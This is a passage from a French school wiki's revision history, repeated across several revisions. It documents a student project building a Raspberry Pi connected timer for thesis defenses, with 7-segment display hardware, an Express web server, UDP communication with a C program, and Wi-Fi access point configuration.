Durant cette séance, nous avons également penser au soft qui sera embarqué dans la Raspberry. Nous avions décidé de configurer la Raspberry en accesspoint WiFi et de faire tourner un serveur web qui sera accessible lorsque l'utilisateur se connecte au WiFi de la Raspberry. En parallèle, un autre programme tournera sur la Raspberry et s'occupera du calcul du Timer et du contrôle des leds. pour que le programme puisse communiquer avec le serveur nous avons plusieurs solutions que nous allons étudier : ipc, socket, écriture/lecture dans des fichiers.<br />
<br />
===Serveur web===<br />
<br />
Selon la définition Wikipédia, Express est un framework nodejs permettant de mettre en place des applications web. Il s'agit du framework le plus utilisé dans ce but sous l'environnement NodeJS.<br />
N'ayant jamais utilisé Express, nous avons dû se renseigner sur son fonctionnement et se documenter sur les possibilités du framework. <br />
Express est basé sur une architecture typique MVC (Model-View-Controller). Nous pouvons définir des middlewares permettant de capturer les requêtes, de réaliser un traitement préalable, puis de renvoyer la page. Pour cela, il suffit de définir des routes, qui définirons les différentes requêtes HTTP possibles.<br />
<br />
{| class="wikitable"<br />
! style="text-align: center; font-weight:bold;" | Route<br />
! style="text-align: center; font-weight:bold;" | Méthode<br />
! style="text-align: center; font-weight:bold;" | Description<br />
|-<br />
| /<br />
| GET<br />
| Permet de réaliser un choix entre l'interface enseignant et étudiant<br />
|-<br />
| /prof<br />
| GET<br />
| Permet de parametrer le timer, en informant le nom du créateur du timer,<br />
la durée de celui-ci en minutes, et l'étudiant en question.<br />
|-<br />
| /prof/timer<br />
| GET<br />
| Si un timer est configuré, affiche ce dernier, ainsi qu'un formulaire permettant <br />
d'envoyer un commentaire.<br />
|-<br />
| /prof/timer<br />
| POST<br />
| Permet de traiter soit un nouveau commentaire, soit de lancer le timer<br />
|-<br />
| /etudiant<br />
| GET<br />
| Permet d'afficher les commentaires et un timer approximatif, qui vire au rouge lorsque<br />
le temps devient critique (<2 minutes)<br />
|}<br />
<br />
Les routes étant fixés et définies, nous pouvons passer à la réalisation.<br />
<br />
==Séance 4==<br />
<br />
===Carte électronique===<br />
<br />
Lors de cette séance, nous avons pu terminer la carte. Le schematic final est le suivant : <br />
<br />
<br />
[[Fichier:SchematicP4IOT.png|center|1000px]]<br />
<br />
<br />
Le PCB est le suivant : <br />
<br />
[[Fichier:RoutageP4IOT.png|center|1000px]]<br />
<br />
<br />
<br />
===Serveur web===<br />
Afin de pouvoir communiquer avec le programme principal manipulant le véritable timer, il est nécessaire d'implémenter une sorte de communication inter-processus. Le choix est porté sur la mise en place d'une liaison sockets UDP, qui sont plus pratique dans notre cas que des sockets basés sur TCP.<br />
Ainsi, le module 'dgram' (pour datagram, de UDP datagram socket), permet d'écouter pour un 'datagram' sur un port particulier, ou simplement de broadcaster un message. <br />
Le serveur web permettra ainsi d'envoyer la valeur du timer en secondes, tandis que le programme principal en C écoutera sur un port spécifié, et lancera le timer dès la réception de la valeur. <br />
Le code permettant l'envoi d'un message par socket UDP est simple à réaliser :<br />
<br />
[[Fichier:Dgramtimer.png|600px]]<br />
<br />
Nous avons décidés que le timer affiché sur les pages web est simplement à titre indicatif, soit, il ne représente pas réellement le véritable timer, dont la valeur est affiché sur les afficheurs 7 segments. Ce choix à été fait en raison du fait que nodejs et express ne tournent uniquement que sur un thread et ne permettent pas d'écouter sur un port et de rafraichir la page dès une réception.<br />
Ainsi, dès le choix de la valeur du timer, nous sauvegardons la timestamp de fin de celui-ci et lançons le timer pour un compte à rebours vers cette valeur.<br />
<br />
Les commentaires quant à eux sont enregistrés dans un fichier sous format JSON, et dans le cas d'une requête GET, une lecture de ce fichier est réalisée et les commentaires affichés, tandis que dans le cas d'une requête POST, le fichier est réécris en mémoire avec le nouveau commentaire.<br />
L'identifiant d'un professeur commentant est défini sur le formulaire de choix du timer en ne spécifiant que le champ identifiant. La valeur de ce dernier est enregistré dans un cookie de navigateur.<br />
Les informations relatives au timer, au nom de l'étudiant et au créateur du timer sont enregistrés dans un autre fichier JSON et récupérés au besoin.<br />
<br />
[[Fichier:Entreeiot.png|300px]]<br />
[[Fichier:CHOIXIOT.png|300px]]<br />
[[Fichier:TimerProf.png|300px]]<br />
<br />
==Séance 5==<br />
<br />
===Gravure de la carte électronique===<br />
<br />
Après avoir récupéré la carte gravée, nous nous sommes rendu compte qu'il y avait eu un problème de perçage. En effet, certains trous non présents sur le schéma de routage se trouvaient la carte, d'autres n'étaient pas du tout présent ou alors pas à la bonne place. Pourtant, nous n’apercevions aucun problème lors de la vérification des fichiers gerber avec http://www.gerber-viewer.com/. Nous avons alors passé pas mal de temps à rechercher la cause du problème avec Monsieur Flamen. Finalement, le problème provenait de la génération des fichiers gerber. Après avoir corrigé le problème, la carte a pu être regravée correctement.<br />
<br />
===Configuration de la raspberry pi===<br />
<br />
Nous configurons la raspberry afin d'agir en tant que point d'accès afin de pouvoir accéder à l'interface web : <br />
<br />
Nous installons tout d'abord les paquets dnsmasq et hostapd, permettant de configurer le point d'accès et fournir le service DNS :<br />
$ sudo apt-get install dnsmasq hostapd<br />
<br />
Nous modifions le fichier de configuration de dhcpcd en ajoutant : <br />
interface wlan0<br />
static ip_address=192.168.4.1/24<br />
nohook wpa_supplicant<br />
<br />
Nous relançons ensuite le service dhcpcd.<br />
<br />
Nous modifions ensuite le fichier de configuration de dnsmasq, qui va définir la plage d'IPs à attribuer : <br />
interface=wlan0<br />
dhcp-range=192.168.4.2,192.168.4.20,255.255.255.0,24h<br />
<br />
Enfin, nous écrivons la configuration de notre point d'accès dans un fichier de configuration de hostapd : <br />
<br />
interface=wlan0<br />
driver=nl80211<br />
ssid=TimerIOT<br />
hw_mode=g<br />
channel=7<br />
wmm_enabled=0<br />
macaddr_acl=0<br />
auth_algs=1<br />
ignore_broadcast_ssid=0<br />
wpa=2<br />
wpa_passphrase=timeriot<br />
wpa_key_mgmt=WPA-PSK<br />
wpa_pairwise=TKIP<br />
rsn_pairwise=CCMP<br />
<br />
Enfin, nous lançons les processus hostapd et dnsmasq : <br />
$ sudo systemctl start hostapd<br />
$ sudo systemctl start dnsmasq<br />
<br />
Nous rebootons enfin la raspberry. La page web est ainsi accessible en se connectant au point d'accès et en tapant http://192.168.4.1:3000 dans le navigateur.<br />
<br />
===Programme Raspberry===<br />
<br />
Pendant cette séance nous avons également finaliser le programme de la Raspberry et installer les librairies qui permettent d'utiliser le registre à décalage et les GPIO <code>WiringPi</code>.<br />
<br />
Dans ce programme, après les initialisations, une socket UDP est crée pour recevoir la valeur initiale du Timer depuis le serveur web. La socket est par la suite fermée et le message reçu converti en Entier. Puis deux threads sont lancés : Le premier qui permet le calcul du Timer en se basant sur la valeur initial et en utilisant l'horloge physique de la Raspberry (fonction : <code>clock_gettime(CLOCK_REALTIME, &<timespec>);</code>), le deuxième thread contrôle les 7-segements après l'avoir parser en unités et dizaines. Les deux threads communiquent entre eux avec un pipe et un système de verrou pour synchroniser l'envoie et la réception. Finalement les threads et le pipe sont fermés proprement.<br />
<br />
Ce programme affiche les valeurs supérieurs à 99 secondes en minutes et celle inférieurs à 99 secondes en seconde. Le programme et disponible sur le git : https://github.com/ael-mess/raspberry-pi-timer/blob/master/pi.c<br />
<br />
==Séance 6==<br />
<br />
Durant cette séance nous avons combiner les deux programmes, et automatiser leurs lancement. Nous avons crée un script shell qui lance le serveur web, puis dans une boucle infini lance le Timer puis supprime les fichiers .json du controllers du serveur web à la fin de chaque timer. Ce script à était mis dans <code>/etc/.rclocal</code> de la Raspberry en tache de fond, pour qu'il puissent être lancer à chaque allumage de la Raspberry même avant le loging.<br />
<br />
===Test===<br />
<br />
Pendant cette dernière séance nous avons également souder une partie de nos composants pour faire des tests. Le test de la partie électronique à révéler un comportement anormal du circuit : des segments de leds restent allumer sans que aucune tension sur la base des transistors ne soit appliquée. Nous nous sommes assuré de corriger toutes les erreurs de soudure/contact mais nous n'avions pas pu trouver la source du problème. L’hypothèse qui ont était émise est que la carte n'aillant pas était nettoyé avant la soudure, le contact n'était pas pareil pour tous les composants, et du coup le potentiel entre deux points reliées n'était pas identique (M.Thierry Flamen).<br />
<br />
La partie logiciel elle, marche très bien sans aucun comportement anormal.<br />
<br />
===Amélioration si plus temps===<br />
<br />
- prendre plus de temps pour réaliser et tester la partie hardware.<br />
<br />
- utiliser la socket pour l'envoie de chaque valeur du timer et non que pour la valeur initial. (parce que le timer calculer par le serveur web utilise la date de la Raspberry et n'est pas précis)<br />
<br />
==Flyer==<br />
[[Fichier:Flyer timer iot.jpeg|800px|center]]</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=P4_IOT_2018&diff=49401P4 IOT 20182019-01-21T00:00:23Z<p>Mcreteur : /* Carte électronique */</p>
<hr />
<div>=Présentation du sujet =<br />
<br />
==Contexte==<br />
<br />
Prenons le cas d'une soutenance de quatrième année, strictement limitée en temps. On ne voudrait surtout pas rater cette dernière et ne pas avoir l'occasion de passer en revue l'ensemble de ses slides ! Le jury ne souhaite cependant pas faire office d'arbitre ou d'interrompre la personne soutenant. Ainsi, un timer connecté permettant d'indiquer le temps restant aux deux parties est placé sur la table. Ce timer fait également office de point d'accès et permet de se connecter à une page web ou les enseignants peuvent noter des commentaires que l'étudiant peut observer en temps réel.<br />
<br />
==Description du projet==<br />
<br />
Le projet consiste donc à réaliser un timer connecté, disposant de 4 afficheurs 7 segments, dont deux feront face à l'étudiant et les deux autres au jury. Nous utilisons une raspberry pi 3, et nous basons ainsi notre timer sur le timer ARM de cette dernière. La raspberry fait également office de point d'accès permettant de délivrer une page web qui permet de configurer le timer.<br />
Le code controllant les afficheurs 7 segments sera réalisé en C.<br />
Le serveur web sera basé sur le framework express de node js.<br />
Le PCB sera réalisé sous Eagle.<br />
<br />
=Réalisation=<br />
<br />
==Matériel utilisé==<br />
<br />
* 1 Raspberry pi 3<br />
* 4 afficheurs 7 segments [http://www.kingbrightusa.com/images/catalog/SPEC/SA23-11SRWA.pdf SA23-11SRWA]<br />
* 16 transistors PNP [http://njsemi.com/datasheets/2N2894.pdf 2N2894]<br />
* 2 multiplexeurs [https://www.diodes.com/assets/Datasheets/74HCT595.pdf 74HCT595]<br />
* 16 résistances 56 Ohms<br />
* 16 résistances 1,2kOhms<br />
* 2 capacités 100nF<br />
* 1 capacité 10uF<br />
<br />
==Séance 1==<br />
<br />
===Recherche d'un sujet et clarification du cahier des charges===<br />
<br />
Après avoir passé du temps à rechercher un sujet, nous nous sommes orienté vers le sujet proposé par les encadrants, le timer connecté. Nous avons alors passé le reste de la séance à effectuer des recherches sur le matériel à utiliser ainsi qu'à définir les fonctionnalités que présentera notre timer. Les fonctionnalités retenues sont les suivantes : <br />
<br />
- Une application mobile permettra de contrôler le timer<br />
<br />
- Si l'utilisateur est un membre du jury, il pourra modifier le timer<br />
<br />
- Si l'utilisateur est une personne qui soutient, il ne pourra que consulter le timer<br />
<br />
- Un système de vote sera disponible à partir de l'application<br />
<br />
- Lorsqu'il restera 2 minutes sur le timer, le téléphone de l'utilisateur vibrera<br />
<br />
- Le timer sera double face afin qu'il soit visible par le jury et l'étudiant<br />
<br />
<br />
Finalement, nous avons été amené à revoir les fonctionnalités proposées au cours du projet par manque de temps. L'application a été remplacé par un site web. Le système de vote n'a pas été mis en place mais le membre du jury peut écrire des commentaires à la personne qui soutient à travers le site web. La fonctionnalité de vibration à été remplacée par un système de modification de la coloration du timer présent sur le site web à partir d'un certain temps restant.<br />
<br />
==Séance 2==<br />
<br />
===Structuration du projet===<br />
<br />
Lors de cette séance, des afficheurs 7-segments nous ont été fournis. Cependant, ils présentent la particularité d'être alimenté avec 12V. Les alimenter directement par la Raspberry qui elle peut fournir 5V n'est donc pas possible. <br />
<br />
Nous avons passé du temps lors de cette séance à trouver une solution pour le contrôle des LED. Nous en avons retenu deux : <br />
<br />
- Utiliser des pilotes de LED [http://www.ti.com/lit/ds/symlink/tlc5947.pdf TLC5947] <br />
<br />
- Utiliser des transistors<br />
<br />
Nous avons alors décidé de partir sur les pilotes de LED pour plus de simplicité, ces derniers gérant eux mêmes le courant fournis aux LED. Après avoir pris cette décision, nous avons débuté la conception de la carte sous Eagle. Nous avons choisi ce logiciel car les toutes les footprint des composants utilisés sont disponibles sur le net.<br />
<br />
==Séance 3==<br />
<br />
===Carte électronique===<br />
<br />
Après avoir bien avancé sur la carte, nous nous sommes rendu compte que les afficheurs utilisés étaient à cathode commune. Cela pose un problème puisque les pilotes de LED dont nous disposons ne sont pas compatibles avec cette configuration. Nous avons donc du nous tourner vers l'autre solution pour le contrôle des leds, celle avec les transistors. Disposant de 4 afficheurs à 7segments (+ le point), les GPIO de la Raspberry ne sont pas assez nombreux, nous avons donc du utiliser des multiplexeurs. Nous avons alors passé cette séance à étudier les datasheet des différents composants et à établir un nouveau schéma pour la carte.<br />
<br />
Les afficheurs 7-segments de devant ayant à afficher la même chose que ceux de derrière, nous les connecterons entre eux afin réduire de moitié la quantité de composants à utiliser.<br />
<br />
===Serveur web===<br />
<br />
Selon la définition Wikipédia, Express est un framework nodejs permettant de mettre en place des applications web. Il s'agit du framework le plus utilisé dans ce but sous l'environnement NodeJS.<br />
N'ayant jamais utilisé Express, nous avons dû se renseigner sur son fonctionnement et se documenter sur les possibilités du framework. <br />
Express est basé sur une architecture typique MVC (Model-View-Controller). Nous pouvons définir des middlewares permettant de capturer les requêtes, de réaliser un traitement préalable, puis de renvoyer la page. Pour cela, il suffit de définir des routes, qui définirons les différentes requêtes HTTP possibles.<br />
<br />
{| class="wikitable"<br />
! style="text-align: center; font-weight:bold;" | Route<br />
! style="text-align: center; font-weight:bold;" | Méthode<br />
! style="text-align: center; font-weight:bold;" | Description<br />
|-<br />
| /<br />
| GET<br />
| Permet de réaliser un choix entre l'interface enseignant et étudiant<br />
|-<br />
| /prof<br />
| GET<br />
| Permet de parametrer le timer, en informant le nom du créateur du timer,<br />
la durée de celui-ci en minutes, et l'étudiant en question.<br />
|-<br />
| /prof/timer<br />
| GET<br />
| Si un timer est configuré, affiche ce dernier, ainsi qu'un formulaire permettant <br />
d'envoyer un commentaire.<br />
|-<br />
| /prof/timer<br />
| POST<br />
| Permet de traiter soit un nouveau commentaire, soit de lancer le timer<br />
|-<br />
| /etudiant<br />
| GET<br />
| Permet d'afficher les commentaires et un timer approximatif, qui vire au rouge lorsque<br />
le temps devient critique (<2 minutes)<br />
|}<br />
<br />
Les routes étant fixés et définies, nous pouvons passer à la réalisation.<br />
<br />
==Séance 4==<br />
<br />
===Carte électronique===<br />
<br />
Lors de cette séance, nous avons pu terminer la carte. Le schematic final est le suivant : <br />
<br />
<br />
[[Fichier:SchematicP4IOT.png|center|1000px]]<br />
<br />
<br />
Le PCB est le suivant : <br />
<br />
[[Fichier:RoutageP4IOT.png|center|1000px]]<br />
<br />
<br />
<br />
===Serveur web===<br />
Afin de pouvoir communiquer avec le programme principal manipulant le véritable timer, il est nécessaire d'implémenter une sorte de communication inter-processus. Le choix est porté sur la mise en place d'une liaison sockets UDP, qui sont plus pratique dans notre cas que des sockets basés sur TCP.<br />
Ainsi, le module 'dgram' (pour datagram, de UDP datagram socket), permet d'écouter pour un 'datagram' sur un port particulier, ou simplement de broadcaster un message. <br />
Le serveur web permettra ainsi d'envoyer la valeur du timer en secondes, tandis que le programme principal en C écoutera sur un port spécifié, et lancera le timer dès la réception de la valeur. <br />
Le code permettant l'envoi d'un message par socket UDP est simple à réaliser :<br />
<br />
[[Fichier:Dgramtimer.png|600px]]<br />
<br />
Nous avons décidés que le timer affiché sur les pages web est simplement à titre indicatif, soit, il ne représente pas réellement le véritable timer, dont la valeur est affiché sur les afficheurs 7 segments. Ce choix à été fait en raison du fait que nodejs et express ne tournent uniquement que sur un thread et ne permettent pas d'écouter sur un port et de rafraichir la page dès une réception.<br />
Ainsi, dès le choix de la valeur du timer, nous sauvegardons la timestamp de fin de celui-ci et lançons le timer pour un compte à rebours vers cette valeur.<br />
<br />
Les commentaires quant à eux sont enregistrés dans un fichier sous format JSON, et dans le cas d'une requête GET, une lecture de ce fichier est réalisée et les commentaires affichés, tandis que dans le cas d'une requête POST, le fichier est réécris en mémoire avec le nouveau commentaire.<br />
L'identifiant d'un professeur commentant est défini sur le formulaire de choix du timer en ne spécifiant que le champ identifiant. La valeur de ce dernier est enregistré dans un cookie de navigateur.<br />
Les informations relatives au timer, au nom de l'étudiant et au créateur du timer sont enregistrés dans un autre fichier JSON et récupérés au besoin.<br />
<br />
[[Fichier:Entreeiot.png|300px]]<br />
[[Fichier:CHOIXIOT.png|300px]]<br />
[[Fichier:TimerProf.png|300px]]<br />
<br />
==Séance 5==<br />
<br />
===Gravure de la carte électronique===<br />
<br />
Après avoir récupéré la carte gravée, nous nous sommes rendu compte qu'il y avait eu un problème de perçage. En effet, certains trous non présents sur le schéma de routage se trouvaient la carte, d'autres n'étaient pas du tout présent ou alors pas à la bonne place. Pourtant, nous n’apercevions aucun problème lors de la vérification des fichiers gerber avec http://www.gerber-viewer.com/. Nous avons alors passé pas mal de temps à rechercher la cause du problème avec Monsieur Flamen. Finalement, le problème provenait de la génération des fichiers gerber. Après avoir corrigé le problème, la carte a pu être regravée correctement.<br />
<br />
===Configuration de la raspberry pi===<br />
<br />
Nous configurons la raspberry afin d'agir en tant que point d'accès afin de pouvoir accéder à l'interface web : <br />
<br />
Nous installons tout d'abord les paquets dnsmasq et hostapd, permettant de configurer le point d'accès et fournir le service DNS :<br />
$ sudo apt-get install dnsmasq hostapd<br />
<br />
Nous modifions le fichier de configuration de dhcpcd en ajoutant : <br />
interface wlan0<br />
static ip_address=192.168.4.1/24<br />
nohook wpa_supplicant<br />
<br />
Nous relançons ensuite le service dhcpcd.<br />
<br />
Nous modifions ensuite le fichier de configuration de dnsmasq, qui va définir la plage d'IPs à attribuer : <br />
interface=wlan0<br />
dhcp-range=192.168.4.2,192.168.4.20,255.255.255.0,24h<br />
<br />
Enfin, nous écrivons la configuration de notre point d'accès dans un fichier de configuration de hostapd : <br />
<br />
interface=wlan0<br />
driver=nl80211<br />
ssid=TimerIOT<br />
hw_mode=g<br />
channel=7<br />
wmm_enabled=0<br />
macaddr_acl=0<br />
auth_algs=1<br />
ignore_broadcast_ssid=0<br />
wpa=2<br />
wpa_passphrase=timeriot<br />
wpa_key_mgmt=WPA-PSK<br />
wpa_pairwise=TKIP<br />
rsn_pairwise=CCMP<br />
<br />
Enfin, nous lançons les processus hostapd et dnsmasq : <br />
$ sudo systemctl start hostapd<br />
$ sudo systemctl start dnsmasq<br />
<br />
Nous rebootons enfin la raspberry. La page web est ainsi accessible en se connectant au point d'accès et en tapant http://192.168.4.1:3000 dans le navigateur.</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=P4_IOT_2018&diff=49400P4 IOT 20182019-01-20T23:58:20Z<p>Mcreteur : /* Séance 4 */</p>
<hr />
<div>=Présentation du sujet =<br />
<br />
==Contexte==<br />
<br />
Prenons le cas d'une soutenance de quatrième année, strictement limitée en temps. On ne voudrait surtout pas rater cette dernière et ne pas avoir l'occasion de passer en revue l'ensemble de ses slides ! Le jury ne souhaite cependant pas faire office d'arbitre ou d'interrompre la personne soutenant. Ainsi, un timer connecté permettant d'indiquer le temps restant aux deux parties est placé sur la table. Ce timer fait également office de point d'accès et permet de se connecter à une page web ou les enseignants peuvent noter des commentaires que l'étudiant peut observer en temps réel.<br />
<br />
==Description du projet==<br />
<br />
Le projet consiste donc à réaliser un timer connecté, disposant de 4 afficheurs 7 segments, dont deux feront face à l'étudiant et les deux autres au jury. Nous utilisons une raspberry pi 3, et nous basons ainsi notre timer sur le timer ARM de cette dernière. La raspberry fait également office de point d'accès permettant de délivrer une page web qui permet de configurer le timer.<br />
Le code controllant les afficheurs 7 segments sera réalisé en C.<br />
Le serveur web sera basé sur le framework express de node js.<br />
Le PCB sera réalisé sous Eagle.<br />
<br />
=Réalisation=<br />
<br />
==Matériel utilisé==<br />
<br />
* 1 Raspberry pi 3<br />
* 4 afficheurs 7 segments [http://www.kingbrightusa.com/images/catalog/SPEC/SA23-11SRWA.pdf SA23-11SRWA]<br />
* 16 transistors PNP [http://njsemi.com/datasheets/2N2894.pdf 2N2894]<br />
* 2 multiplexeurs [https://www.diodes.com/assets/Datasheets/74HCT595.pdf 74HCT595]<br />
* 16 résistances 56 Ohms<br />
* 16 résistances 1,2kOhms<br />
* 2 capacités 100nF<br />
* 1 capacité 10uF<br />
<br />
==Séance 1==<br />
<br />
===Recherche d'un sujet et clarification du cahier des charges===<br />
<br />
Après avoir passé du temps à rechercher un sujet, nous nous sommes orienté vers le sujet proposé par les encadrants, le timer connecté. Nous avons alors passé le reste de la séance à effectuer des recherches sur le matériel à utiliser ainsi qu'à définir les fonctionnalités que présentera notre timer. Les fonctionnalités retenues sont les suivantes : <br />
<br />
- Une application mobile permettra de contrôler le timer<br />
<br />
- Si l'utilisateur est un membre du jury, il pourra modifier le timer<br />
<br />
- Si l'utilisateur est une personne qui soutient, il ne pourra que consulter le timer<br />
<br />
- Un système de vote sera disponible à partir de l'application<br />
<br />
- Lorsqu'il restera 2 minutes sur le timer, le téléphone de l'utilisateur vibrera<br />
<br />
- Le timer sera double face afin qu'il soit visible par le jury et l'étudiant<br />
<br />
<br />
Finalement, nous avons été amené à revoir les fonctionnalités proposées au cours du projet par manque de temps. L'application a été remplacé par un site web. Le système de vote n'a pas été mis en place mais le membre du jury peut écrire des commentaires à la personne qui soutient à travers le site web. La fonctionnalité de vibration à été remplacée par un système de modification de la coloration du timer présent sur le site web à partir d'un certain temps restant.<br />
<br />
==Séance 2==<br />
<br />
===Structuration du projet===<br />
<br />
Lors de cette séance, des afficheurs 7-segments nous ont été fournis. Cependant, ils présentent la particularité d'être alimenté avec 12V. Les alimenter directement par la Raspberry qui elle peut fournir 5V n'est donc pas possible. <br />
<br />
Nous avons passé du temps lors de cette séance à trouver une solution pour le contrôle des LED. Nous en avons retenu deux : <br />
<br />
- Utiliser des pilotes de LED [http://www.ti.com/lit/ds/symlink/tlc5947.pdf TLC5947] <br />
<br />
- Utiliser des transistors<br />
<br />
Nous avons alors décidé de partir sur les pilotes de LED pour plus de simplicité, ces derniers gérant eux mêmes le courant fournis aux LED. Après avoir pris cette décision, nous avons débuté la conception de la carte sous Eagle. Nous avons choisi ce logiciel car les toutes les footprint des composants utilisés sont disponibles sur le net.<br />
<br />
==Séance 3==<br />
<br />
===Carte électronique===<br />
<br />
Après avoir bien avancé sur la carte, nous nous sommes rendu compte que les afficheurs utilisés étaient à cathode commune. Cela pose un problème puisque les pilotes de LED dont nous disposons ne sont pas compatibles avec cette configuration. Nous avons donc du nous tourner vers l'autre solution pour le contrôle des leds, celle avec les transistors. Disposant de 4 afficheurs à 7segments (+ le point), les GPIO de la Raspberry ne sont pas assez nombreux, nous avons donc du utiliser des multiplexeurs. Nous avons alors passé cette séance à étudier les datasheet des différents composants et à établir un nouveau schéma pour la carte.<br />
<br />
===Serveur web===<br />
<br />
Selon la définition Wikipédia, Express est un framework nodejs permettant de mettre en place des applications web. Il s'agit du framework le plus utilisé dans ce but sous l'environnement NodeJS.<br />
N'ayant jamais utilisé Express, nous avons dû se renseigner sur son fonctionnement et se documenter sur les possibilités du framework. <br />
Express est basé sur une architecture typique MVC (Model-View-Controller). Nous pouvons définir des middlewares permettant de capturer les requêtes, de réaliser un traitement préalable, puis de renvoyer la page. Pour cela, il suffit de définir des routes, qui définirons les différentes requêtes HTTP possibles.<br />
<br />
{| class="wikitable"<br />
! style="text-align: center; font-weight:bold;" | Route<br />
! style="text-align: center; font-weight:bold;" | Méthode<br />
! style="text-align: center; font-weight:bold;" | Description<br />
|-<br />
| /<br />
| GET<br />
| Permet de réaliser un choix entre l'interface enseignant et étudiant<br />
|-<br />
| /prof<br />
| GET<br />
| Permet de parametrer le timer, en informant le nom du créateur du timer,<br />
la durée de celui-ci en minutes, et l'étudiant en question.<br />
|-<br />
| /prof/timer<br />
| GET<br />
| Si un timer est configuré, affiche ce dernier, ainsi qu'un formulaire permettant <br />
d'envoyer un commentaire.<br />
|-<br />
| /prof/timer<br />
| POST<br />
| Permet de traiter soit un nouveau commentaire, soit de lancer le timer<br />
|-<br />
| /etudiant<br />
| GET<br />
| Permet d'afficher les commentaires et un timer approximatif, qui vire au rouge lorsque<br />
le temps devient critique (<2 minutes)<br />
|}<br />
<br />
Les routes étant fixés et définies, nous pouvons passer à la réalisation.<br />
<br />
==Séance 4==<br />
<br />
===Carte électronique===<br />
<br />
Lors de cette séance, nous avons pu terminer la carte. Le schematic final est le suivant : <br />
<br />
<br />
[[Fichier:SchematicP4IOT.png|center|1000px]]<br />
<br />
<br />
Le PCB est le suivant : <br />
<br />
[[Fichier:RoutageP4IOT.png|center|1000px]]<br />
<br />
<br />
<br />
===Serveur web===<br />
Afin de pouvoir communiquer avec le programme principal manipulant le véritable timer, il est nécessaire d'implémenter une sorte de communication inter-processus. Le choix est porté sur la mise en place d'une liaison sockets UDP, qui sont plus pratique dans notre cas que des sockets basés sur TCP.<br />
Ainsi, le module 'dgram' (pour datagram, de UDP datagram socket), permet d'écouter pour un 'datagram' sur un port particulier, ou simplement de broadcaster un message. <br />
Le serveur web permettra ainsi d'envoyer la valeur du timer en secondes, tandis que le programme principal en C écoutera sur un port spécifié, et lancera le timer dès la réception de la valeur. <br />
Le code permettant l'envoi d'un message par socket UDP est simple à réaliser :<br />
<br />
[[Fichier:Dgramtimer.png|600px]]<br />
<br />
Nous avons décidés que le timer affiché sur les pages web est simplement à titre indicatif, soit, il ne représente pas réellement le véritable timer, dont la valeur est affiché sur les afficheurs 7 segments. Ce choix à été fait en raison du fait que nodejs et express ne tournent uniquement que sur un thread et ne permettent pas d'écouter sur un port et de rafraichir la page dès une réception.<br />
Ainsi, dès le choix de la valeur du timer, nous sauvegardons la timestamp de fin de celui-ci et lançons le timer pour un compte à rebours vers cette valeur.<br />
<br />
Les commentaires quant à eux sont enregistrés dans un fichier sous format JSON, et dans le cas d'une requête GET, une lecture de ce fichier est réalisée et les commentaires affichés, tandis que dans le cas d'une requête POST, le fichier est réécris en mémoire avec le nouveau commentaire.<br />
L'identifiant d'un professeur commentant est défini sur le formulaire de choix du timer en ne spécifiant que le champ identifiant. La valeur de ce dernier est enregistré dans un cookie de navigateur.<br />
Les informations relatives au timer, au nom de l'étudiant et au créateur du timer sont enregistrés dans un autre fichier JSON et récupérés au besoin.<br />
<br />
[[Fichier:Entreeiot.png|300px]]<br />
[[Fichier:CHOIXIOT.png|300px]]<br />
[[Fichier:TimerProf.png|300px]]<br />
<br />
==Séance 5==<br />
<br />
===Gravure de la carte électronique===<br />
<br />
Après avoir récupéré la carte gravée, nous nous sommes rendu compte qu'il y avait eu un problème de perçage. En effet, certains trous non présents sur le schéma de routage se trouvaient la carte, d'autres n'étaient pas du tout présent ou alors pas à la bonne place. Pourtant, nous n’apercevions aucun problème lors de la vérification des fichiers gerber avec http://www.gerber-viewer.com/. Nous avons alors passé pas mal de temps à rechercher la cause du problème avec Monsieur Flamen. Finalement, le problème provenait de la génération des fichiers gerber. Après avoir corrigé le problème, la carte a pu être regravée correctement.<br />
<br />
===Configuration de la raspberry pi===<br />
<br />
Nous configurons la raspberry afin d'agir en tant que point d'accès afin de pouvoir accéder à l'interface web : <br />
<br />
Nous installons tout d'abord les paquets dnsmasq et hostapd, permettant de configurer le point d'accès et fournir le service DNS :<br />
$ sudo apt-get install dnsmasq hostapd<br />
<br />
Nous modifions le fichier de configuration de dhcpcd en ajoutant : <br />
interface wlan0<br />
static ip_address=192.168.4.1/24<br />
nohook wpa_supplicant<br />
<br />
Nous relançons ensuite le service dhcpcd.<br />
<br />
Nous modifions ensuite le fichier de configuration de dnsmasq, qui va définir la plage d'IPs à attribuer : <br />
interface=wlan0<br />
dhcp-range=192.168.4.2,192.168.4.20,255.255.255.0,24h<br />
<br />
Enfin, nous écrivons la configuration de notre point d'accès dans un fichier de configuration de hostapd : <br />
<br />
interface=wlan0<br />
driver=nl80211<br />
ssid=TimerIOT<br />
hw_mode=g<br />
channel=7<br />
wmm_enabled=0<br />
macaddr_acl=0<br />
auth_algs=1<br />
ignore_broadcast_ssid=0<br />
wpa=2<br />
wpa_passphrase=timeriot<br />
wpa_key_mgmt=WPA-PSK<br />
wpa_pairwise=TKIP<br />
rsn_pairwise=CCMP<br />
<br />
Enfin, nous lançons les processus hostapd et dnsmasq : <br />
$ sudo systemctl start hostapd<br />
$ sudo systemctl start dnsmasq<br />
<br />
Nous rebootons enfin la raspberry. La page web est ainsi accessible en se connectant au point d'accès et en tapant http://192.168.4.1:3000 dans le navigateur.</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:RoutageP4IOT.png&diff=49399Fichier:RoutageP4IOT.png2019-01-20T23:56:53Z<p>Mcreteur : </p>
<hr />
<div></div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:SchematicP4IOT.png&diff=49398Fichier:SchematicP4IOT.png2019-01-20T23:54:28Z<p>Mcreteur : </p>
<hr />
<div></div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=P4_IOT_2018&diff=49397P4 IOT 20182019-01-20T23:49:49Z<p>Mcreteur : /* Carte électronique */</p>
<hr />
<div>=Présentation du sujet =<br />
<br />
==Contexte==<br />
<br />
Prenons le cas d'une soutenance de quatrième année, strictement limitée en temps. On ne voudrait surtout pas rater cette dernière et ne pas avoir l'occasion de passer en revue l'ensemble de ses slides ! Le jury ne souhaite cependant pas faire office d'arbitre ou d'interrompre la personne soutenant. Ainsi, un timer connecté permettant d'indiquer le temps restant aux deux parties est placé sur la table. Ce timer fait également office de point d'accès et permet de se connecter à une page web ou les enseignants peuvent noter des commentaires que l'étudiant peut observer en temps réel.<br />
<br />
==Description du projet==<br />
<br />
